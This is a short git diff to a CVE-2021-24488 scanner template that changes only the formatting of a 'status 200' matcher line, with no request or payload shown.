cves/2021/CVE-2021-24488.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-24488.yaml b/cves/2021/CVE-2021-24488.yaml
index b0ac04b7da..227a6f412a 100644
--- a/cves/2021/CVE-2021-24488.yaml
+++ b/cves/2021/CVE-2021-24488.yaml
@@ -42,4 +42,4 @@ requests:
- type: status
status:
- - 200
+ - 200